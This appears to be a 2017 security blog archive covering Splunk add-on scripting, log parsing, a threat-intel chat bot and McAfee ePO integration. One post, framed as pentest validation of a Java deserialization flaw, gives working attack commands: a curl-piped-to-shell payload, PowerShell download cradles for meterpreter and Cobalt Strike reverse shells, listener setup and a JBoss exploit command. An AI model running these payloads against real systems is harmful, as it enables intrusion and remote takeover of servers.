Wednesday, September 13, 2017

Splunk Technology Add-on (TA) Creation Script

By Tony Lee


Introduction

If you develop a Splunk application, at some point you may find yourself needing a Technology Add-on (TA) to accompany the app. Essentially, the TA utilizes much of the app's files, except for the user interface (UI/views). TA's are typically installed on indexers and heavy forwarders to process incoming data. Splunk briefly covers the difference between as app and an add-on in the link below:

https://docs.splunk.com/Documentation/Splunk/6.6.3/Admin/Whatsanapp

Maintaining two codebases can be time consuming though. Instead, it is possible to develop one application and extract the necessary components to build a TA. There may be other solutions such as the Splunk Add-on Builder (https://splunkbase.splunk.com/app/2962/) , but I found this script below to be one of the easiest methods.

Approach

This could be written in any language, however my development environment is Linux-based. The quickest and easiest solution was to write the script using bash. Feel free to translate it to another language if needed though.

Usage

Usage is simple.  Just supply the name of the application and it will create the TA from the existing app.

The app should be located here (if not, change the APP_HOME variable in the script):

/opt/splunk/etc/apps/<AppName>

Copy and paste the bash shell script (Create-TA.sh) below to the /tmp directory and make it executable:

chmod +x /tmp/Create-TA.sh

Then run the script from the tmp directory and supply the application name:

Create-TA.sh <AppName>

Ex:  Create-TA.sh cylance_protect

Once complete, the TA will be located here:  /tmp/TA-<AppName>.spl

Code

#!/bin/bash
# Create-TA
# anlee2 - at - vt.edu
# TA Creation tool written in bash
# Input:  App name   (ex: cylance_protect)
# Output: /tmp/TA-<app name>.spl

# Path to the Splunk app home.  Change if this is not accurate.
APP_HOME="/opt/splunk/etc/apps"


##### Function Usage #####
# Prints usage statement
##########################
Usage()
{
echo "TA-Create v1.0
Usage:  TA-Create.sh <App name>

  -h = help menu

Please report bugs to anlee2@vt.edu"
}


# Detect the absence of command line parameters.  If the user did not specify any, print usage statement
[[ $# -eq 0 || $1 == "-h" ]] && { Usage; exit 0; }

# Set the app name and TA name based on user input
APP_NAME=$1
TA_NAME="TA-$1"

echo -e "\nApp name is:  $APP_NAME\n"


echo -e "Creating directory structure under /tmp/$TA_NAME\n"
mkdir -p /tmp/$TA_NAME/default /tmp/$TA_NAME/metadata /tmp/$TA_NAME/lookups /tmp/$TA_NAME/static /tmp/$TA_NAME/appserver/static


echo -e "Copying files...\n"
cp $APP_HOME/$APP_NAME/default/eventtypes.conf /tmp/$TA_NAME/default/ 2>/dev/null
cp $APP_HOME/$APP_NAME/default/app.conf /tmp/$TA_NAME/default/ 2>/dev/null
cp $APP_HOME/$APP_NAME/default/props.conf /tmp/$TA_NAME/default/ 2>/dev/null
cp $APP_HOME/$APP_NAME/default/tags.conf /tmp/$TA_NAME/default/ 2>/dev/null
cp $APP_HOME/$APP_NAME/default/transforms.conf /tmp/$TA_NAME/default/ 2>/dev/null
cp $APP_HOME/$APP_NAME/static/appIcon.png  /tmp/$TA_NAME/static/appicon.png 2>/dev/null
cp $APP_HOME/$APP_NAME/static/appIcon.png  /tmp/$TA_NAME/appserver/static/appicon.png 2>/dev/null
cp $APP_HOME/$APP_NAME/README /tmp/$TA_NAME/ 2>/dev/null
cp $APP_HOME/$APP_NAME/lookups/* /tmp/$TA_NAME/lookups/ 2>/dev/null

echo -e "Modifying app.conf...\n"
sed -i s/$APP_NAME/$TA_NAME/g /tmp/$TA_NAME/default/app.conf
sed -i "s/is_visible = .*/is_visible = false/g" /tmp/$TA_NAME/default/app.conf
sed -i "s/description = .*/description = TA for $APP_NAME./g" /tmp/$TA_NAME/default/app.conf
sed -i "s/label = .*/label = TA for $APP_NAME./g" /tmp/$TA_NAME/default/app.conf


echo -e "Creating default.meta...\n"
cat >/tmp/$TA_NAME/metadata/default.meta <<EOL
# Application-level permissions
[]
access = read : [ * ], write : [ admin, power ]
export = system

### EVENT TYPES
[eventtypes]
export = system

### PROPS
[props]
export = system

### TRANSFORMS
[transforms]
export = system

### LOOKUPS
[lookups]
export = system

### VIEWSTATES: even normal users should be able to create shared viewstates
[viewstates]
access = read : [ * ], write : [ * ]
export = system
EOL

cd /tmp; tar -zcf TA-$APP_NAME.spl $TA_NAME


echo -e "Finished.\n\nPlease check for you file here:  /tmp/$TA_NAME.spl"

Conclusion

Hopefully this helps others save some time by maintaining one application and extracting the necessary data to create the technology add-on.

Props

Huge thanks to Mike McGinnis for testing and feedback.  :-)

Sunday, August 27, 2017

Splunk: The unsung hero of creative mainframe logging

By Tony Lee

The situation

Have you ever, in your life, heard a good sentence that started with: “So, we have this mainframe... that has logging and compliance requirements…” Yeah, me neither. But this was a unique situation that required a quick and creative solution--and it needed to be done yesterday.  Queue the horror music.

In summary:  We needed to quickly log and make sense of mainframe data for reporting and compliance reasons. The mainframe did not support external logging such as syslog. However, the mainframe could produce a CSV file and that file could be scheduled to upload to an FTP server (Not SFTP, FTPS, or SCP).  Yikes!

Possible solutions

We could stand up an FTP server and use the Splunk Universal forwarder to monitor the FTP upload directory, but we did not have extra hardware or virtual capacity readily available. After a quick Google search, we ran across this little gem of an app called the Splunk FTP Reviver app (written by Luke Murphey):  https://splunkbase.splunk.com/app/3318/. This app cleverly creates a python FTP server using Splunk—best of all, it leverages Splunk’s user accounts and role-based access controls.

How it worked

At a high level, here are the steps involved:
  1. Install the FTP Receiver app:  https://splunkbase.splunk.com/app/3318/
  2. Create an index for the mainframe data (Settings -> Indexes -> New -> Name: mainframe)
  3. Create an FTP directory for the uploaded files (mkdir /opt/splunk/ftp)
  4. Create FTP Data input (Settings -> Data Inputs -> Local Inputs -> FTP -> New -> name: mainframe, port: 2121, path: ftp, sourcetype: csv, index: mainframe)
  5. Create a role with the ftp_write privileges (Settings -> Access Controls -> Roles: Add new -> Name: ftp_write, Capabilities: ftp_write)
  6. Create a Splunk user for the FTP Receiver app (Settings -> Access Controls -> Users: Add new -> Name: mainframe, Assign to roles: ftp_write)
  7. Configure the mainframe to send to the FTP Receiver app port (on your own for that one)
  8. Create a local data input to monitor the FTP upload directory and ingest as CSV (Settings -> Data inputs -> Local inputs -> Files and Directories -> New -> Browse to /opt/splunk/ftp -> Continuously monitor -> Sourcetype: csv, index: mainframe)


Illustrated, the solution looks like this:


Figure 1:  Diagram of functional components

If you run into any issues, troubleshoot and confirm that the FTP server is working via a common web browser.



Figure 2:  Troubleshooting with the web browser

Conclusion

Putting aside concerns that the mainframe may be older than most of the IT staff and the fact that FTP is still a clear-text protocol, this was an interesting solution that was created using the flexibility of Splunk. Add some mitigating controls and a little bit of SPL + dashboard design and it may be the easiest and most powerful mainframe reporter in existence.



Figure 3:  Splunk rocks, the process works

Thursday, August 17, 2017

CyBot – Threat Intelligence Chat Bot

By Tony Lee

Introduction

For those who could not attend, this year’s Black Hat security conference did not disappoint.  It was an awesome time to collaborate and share with the security community.  In doing so, we open sourced a new tool at Black Hat Arsenal at aimed at assisting Security Operations Centers (SOCs) and digital first responders.  We affectionately call it:  CyBot – Threat Intelligence Chat Bot.


We understand that typical SOC environments face a number of challenges:
  • Many SOCs are overwhelmed with the number of incoming alerts
  • Service Level Agreements (SLAs) often define a maximum time to investigate and contain an incident
  • Security tools may be plentiful but they are often not centralized
  • Collaboration on a large investigation may be challenging

We have even seen cases where the SOC receives so many alerts that all of them may not be properly investigated.

To combat this, CyBot can be your threat intelligence chat bot waiting to do research for you.  For example, instead of going to various websites or dashboards to perform research, you could just ask CyBot simple questions and even share results with other investigators.  All from within one chat window you can do the following and more:
·         Ask about the threat reputation of URLs and hashes
·         Perform WHOIS, nslookup, and geoip lookups
·         Unshorten potentially malicious shortened URLs
·         Extract links from a potentially malicious website

CyBot Menu

Best of all, this capability is now free and being actively developed.  All documentation, slides, and plugins have been made publicly available via github:  https://github.com/CylanceSPEAR/CyBot.

Props

Very few tasks are ever accomplished in complete isolation.  Tools, services, and ideas were combined from awesome places such as:
  • Errbot developers for the fantastic tool and customer service
  • VirusTotal
  • geoip - freegeoip.net
  • Google Safebrowsing - https://developers.google.com/safe-browsing/ and Jun C. Valdez Hashid - C0re
  • Unshorten - unshorten.me
  • Codename - https://mark.biek.org/code-name/ Black Hat Arsenal team for the amazing support and tool release venue

  • Non-bots: Bill Hau, Corey White, Dennis Hanzlik, Ian Ahl, Dave Pany, Dan Dumond, Kyle Champlin, Kierian Evans, Andrew Callow, Mark Stevens

Monday, April 24, 2017

Efficient Blue Coat (and other) Splunk Log Parsing

By Tony Lee

Special Notes

1)  This blog post does not only pertain to Blue Coat logs, but possibly other data sources as well.
2)  This is not a knock on Blue Coat, the app, TA, or any of that, it is just one example of many where we might want to change the way we send data to Splunk.  Fortunately Blue Coat provides the means to do so.  (hat tip)

Background info

A little while back, we were working on a custom Splunk app that included ingesting Blue Coat logs into a SOC's single pane of glass, but we were getting an error message of:

Field extractor name=custom_client_events is unusually slow (max single event time=1146ms)

The Splunk architecture was more than sufficient.  The Blue Coat TA worked great on small instances, but we found that it did not scale to a Blue Coat deployment of this magnitude.  The main reason for this error was the parsing in transforms.conf looked like this:

[custom_client_events]
REGEX = (?<date>[^\s]+)\s+(?<time>[^\s]+)\s+(?<duration>[^\s]+)\s+(?<src_ip>[^\s]+)\s+(?<user>[^\s]+)\s+(?<cs_auth_group>[^\s]+)\s+(?<x_exception_id>[^\s]+)\s+(?<filter_result>[^\s]+)\s+\"(?<category>[^\"]+)\"\s+(?<http_referrer>[^\s]+)\s+(?<status>[^\s]+)\s+(?<action>[^\s]+)\s+(?<http_method>[^\s]+)\s+(?<http_content_type>[^\s]+)\s+(?<cs_uri_scheme>[^\s]+)\s+(?<dest>[^\s]+)\s+(?<uri_port>[^\s]+)\s+(?<uri_path>[^\s]+)\s+(?<uri_query>[^\s]+)\s+(?<uri_extension>[^\s]+)\s+\"(?<http_user_agent>[^\"]+)\"\s+(?<dest_ip>[^\s]+)\s+(?<bytes_in>[^\s]+)\s+(?<bytes_out>[^\s]+)\s+\"*(?<x_virus_id>[^\"]+)\"*\s+\"*(?<x_bluecoat_application_name>[^\"]+)\"*\s+\"*(?<x_bluecoat_application_operation>[^\"]+)

The robustness and volume of data was simply too much for this type of extraction.

Solution

The solution is not to make Splunk adapt, but instead change the way data is sent to it. The Blue Coat app and TA require sending data in the bcreportermain_v1 format--which is an ELFF format. Then the Blue Coat app and TA try to parse this space separated data using the complex regex seen above. Instead of doing that, fortunately you can instruct Blue Coat to send the data in a different format such as key value pair--which Splunk likes and natively parses.

In this case, have the Blue Coat admins define a custom log format with the following fields:

Bluecoat|date=$(date)|time=$(time)|duration=$(time-taken)|src_ip=$(c-ip)|user=$(cs-username)|cs_auth_group=$(cs-auth-group)| x_exception_id=$(x-exception-id)|filter_result=$(sc-filter-result)|category=$(cs-categories)|http_referrer=$(cs(Referer))|status=$(sc-status)|action=$(s-action)|http_method=$(cs-method)|http_content_type=$(rs(Content-Type))|cs_uri_scheme=$(cs-uri-scheme)|dest=$(cs-host)| uri_port=$(cs-uri-port)|uri_path=$(cs-uri-path)|uri_query=$(cs-uri-query)|uri_extension=$(cs-uri-extension)|http_user_agent=$(cs(User-Agent))|dest_ip=$(s-ip)|bytes_in=$(sc-bytes)|bytes_out=$(cs-bytes)|x_virus_id=$(x-virus-id)|x_bluecoat_application_name=$(x-bluecoat-application-name)|x_bluecoat_application_operation=$(x-bluecoat-application-operation)|target_ip=$(cs-ip)|proxy_name=$(x-bluecoat-appliance-name)|proxy_ip=$(x-bluecoat-proxy-primary-address)|$(x-bluecoat-special-crlf)

Since this data comes into Splunk as key=value pair now, Splunk parses it natively.

We just removed the TAs from the indexer and replaced it with a simpler props.conf file of this:

[bluecoat:proxysg:customclient]
SHOULD_LINEMERGE = false

This just turns off line merging which is on by default and makes the parsing even faster. Also remember to rename the props.conf and transforms.conf (ex: .bak files) included in the app if you have it installed on your search head--that contains the same complicated regex which will slow down data ingestion. Lastly, by defining your own format, you can add other fields you care about--such as the target IP (cs-ip) which is not included in the default bcreportermain_v1 format for some reason. We hope this helps others that run into this situation.

Conclusion

Again, this issue is not isolated to Blue Coat, but to any data source that has the ability to change the way it sends data. We were quite happy to find that Blue Coat provides that ability and it certainly reduced the load on the entire system and gave back those resources for adding other data.  Hat tip to Blue Coat for providing the flexibility of custom log formats.  Happy Splunking!


Sunday, April 9, 2017

Quick and Easy Deserialization Validation

By Tony and Chris Lee

Maybe you are on a pentest or a vulnerability management team for your organization and you ran across a deserialization finding. This vulnerability affects a number of products including but not limited to JBoss, Jenkins, Weblogic, and Websphere. The example finding below is from Nessus vulnerability scanner:

JBoss Java Object Deserialization RCE
Description:  The remote host is affected by a remote code execution vulnerability due to unsafe deserialize calls of unauthenticated Java objects to the Apache Commons Collections (ACC) library. An unauthenticated, remote attacker can exploit this, by sending a crafted RMI request, to execute arbitrary code on the target host.  (CVE-2015-7501)

Family: Web Servers
Nessus Plugin ID: 87312

Now that you have the finding you need to validate it.  We will outline just one possible method for validating JBoss, Jenkins, Weblogic, and Websphere below.


Background info

In a nutshell: "The Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library."

For more information, a very good and detailed explanation can be found here:  https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/


Step 1) Download Tools

Now on to the exploit/validation!  Clone or download the zipped tools here:  https://github.com/getcode2git/exserial



Step 2) Building the payload

Quick and easy one-liners per the exserial instructions:
The exserial readme provides two great examples shown below, but we will add a Cobalt Strike option for those who prefer a beacon shell.  If you are spawning reverse shells, remember to start your listener first.  ;-)

1) Run a shell script on a Linux victim:
$ java -jar exserial.jar CommandExec Linux "curl http://myserver.com/todo.sh|/bin/sh" > payload.ser

2) Get a reverse HTTPS meterpreter shell via powershell download of Invoke-Shellcode
Setup the listener:
msf> use exploit multi/handler
msf> set payload windows/meterpreter/reverse_https
msf> set lhost <local IP>
msf> set lport <local port>
msf> set ExitOnSession false
msf> exploit -j

Create the serialized payload:
$ java -jar exserial.jar CommandExec Win "powershell IEX (New-Object Net.WebClient).DownloadString('http://myserver.com/CodeExecution/Invoke--Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost <ListenerIP> -Lport 4444 -Force" > payload.ser

3)  Cobalt Strike beacon
Create the listener (ex:  reverse_https to 443)
Cobalt Strike -> Listeners -> Add
Name:  rev_https
Payload windows/beacon_https/reverse_https
IP:  <Your teamserver IP>
Port:  443

Attacks -> Web Drive-by -> Scripted Web delivery
Default will work for this

Create the serialized payload:
java -jar exserial.jar CommandExec Win "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://xxx.xxx.xxx.xxx/a'))" > payload.ser


Step 3) Running the Exploit

Now that the payload is created, it is time to run the exploit. In the scripts folder, you will find four python scripts. The example below shows the syntax and an example for using the JBoss exploit.

Syntax:
python jboss.py http://<target>:<port> /path/to/payload

Example:
python jboss.py  http://JbossServer:8080 /root/deserial/payload.ser


Conclusion

This is a fast and flexible method to validate this vulnerability. Other possibilities for validating this issue include, downloading a "flag", running a reverse ping, or a netcat shell.

Huge thanks to https://github.com/RickGray for the publicly available tools.

Saturday, January 7, 2017

Forensic Investigator Splunk App - Version 1.1.8

By Tony Lee and Kyle Champlin

The latest version of the Forensic Investigator app (version 1.1.8) is now available. We will only cover three major changes, but here are the rest of the details:
  • Added option to hide the MIR menus via the setup screen
  • Added proxy support to setup screen
  • Made vtLookup proxy aware
  • Made vtLookup accept and use non-default API key
  • Added CyberChef (En/Decoder -> CyberChef) - Big thanks to GCHQ for the awesome tool!
  • Added ePO Connector to control McAfee ePolicy Orchestrator
    • Requires editing bin\epoconnector.py and adding ePO IP, port, username, and password

1.  CyberChef

The folks over at GCHQ created an awesome encoding/decoding tool called CyberChef which is available here: https://gchq.github.io/CyberChef/. Even more impressive, it is a stand-alone client-side html page which was released under the Apache License version 2.0. We integrated it into the Forensic Investigator app as a useful component that can be utilized even on closed networks. Huge thanks to the developers at GCHQ.

CyberChef integrated into the Forensic Investigator App

2.  ePO Connector

The Forensic Investigator ePO connector can be used to integrate Splunk and McAfee's ePolicy Orchestrator (ePO). This dashboard can task ePO via its API to do the following:
  • Query
  • Wake up
  • Set tag
  • Clear tag
This allows users to query for hosts using a hostname, IP addrses, MAC address, or even username. Then users can set a tag, wake the host up, and even clear a tag.  This feature is covered in more depth here:  http://securitysynapse.blogspot.com/2016/12/splunk-and-mcafee-epo-integration-part-ii.html

ePO connector feature

3.  Proxy Awareness

You spoke and we listened. The Virus Total Lookup feature in the app is now proxy aware. If this feature works well, we will make the rest of the app proxy aware too. To enable the proxy settings, use the setup screen (Help -> Configure App) and enter the required data found in the screenshot.

Proxy setup
Please let us know if you run into any issues with the proxy setup or if it seems to be working well for you.  We will use this information to tweak the setup screen in the next version of the app.

Conclusion 

We enjoy the feedback on the application--both good and bad, so please keep it coming. Let us know how you are using the application and how we can make it better.  Enjoy. :-)

Monday, December 26, 2016

Splunk and McAfee ePO Integration – Part II

By Tony Lee

In our previous article we outlined one method to integrate McAfee's ePolicy Orchestrator (ePO) with Splunk’s flexible Workflow actions. This allows SOC analysts to task ePO directly from Splunk. In this article, we will highlight a different and potentially more user friendly method. For convenience we have integrated this dashboard into version 1.1.8 of the Forensic Investigator app (Toolbox -> ePO Connector).


Forensic Investigator app ePO connector tool

As with the previous article, all that’s needed is the following:
  • Administrator access to Splunk
  • URL, port, and service account (with administrator rights) to ePO

Testing the ePO API and credentials

It still may be useful to first ensure that our ePO credentials, URL and port are correct. Using the curl command, we will send a few simple queries. If all is well, the command found below will result in a list of supported Web API commands.

curl -v -k -u <User>:<Password> "https://<EPOServer>:<EPOPort>/remote/core.help

If this failed, then check your credentials, IP, port, and connection. Once the command works, try the following to search for a host or user:

curl -v -k -u <User>:<Password> "https://<EPOServer>:<EPOPort>/remote/system.find?searchText=<hostname/IP/MAC/User>

Splunk Integration

The Forensic Investigator ePO connector dashboard contains the following ePO capabilities:

  • Query
  • Wake up
  • Set tag
  • Clear tag

This allows users to query for hosts using a hostname, IP addrses, MAC address, or even username. Then users can set a tag, wake the host up, and even clear a tag.

Setup

1)  Download and install
Before this integration is possible, first install the Forensic Investigator app (version 1.1.8 or later).

2)  CLI edit
Then edit the following file:

$SPLUNK_HOME/etc/apps/ForensicInvestigator/bin/epoconnector.py

Set the following:  IP, port, username, and password

theurl = 'https://<IP>:8443/remote/'
username = '<username>'
password = '<password>'

3)  Web UI dashboard edit
The dashboard is accessible via Toolbox --> ePO Connector.  There is a Quarantine tag present by default, but others can be added via the Splunk UI by selecting the edit button on the dashboard.


Lingering concerns

Using this integration method, there are a few remaining concerns:

  • The ePO password is contained in the epoconnector.py python script
    • Fortunately, this is only exposed to Splunk admins.
    • Let us know if you have another solution.  :-)
  • ePO API authentication uses Base64.  The resulting URL can be modified and it will still be authenticated and will issue commands to ePO.
    • SSL should be used with the ePO API to protect the communications
    • Limit this dashboard to only trusted users.
  • Leaving the system.find searchText parameter blank returns everything in ePO
    • ePO seems resilient even to large queries.  We also filtered out blank queries in the python script.
 

Conclusion 

This second ePO integration method should be quite user friendly and can be restricted to those who only need access to this dashboard. It could also be used in conjunction with out previous integration method too. Enjoy!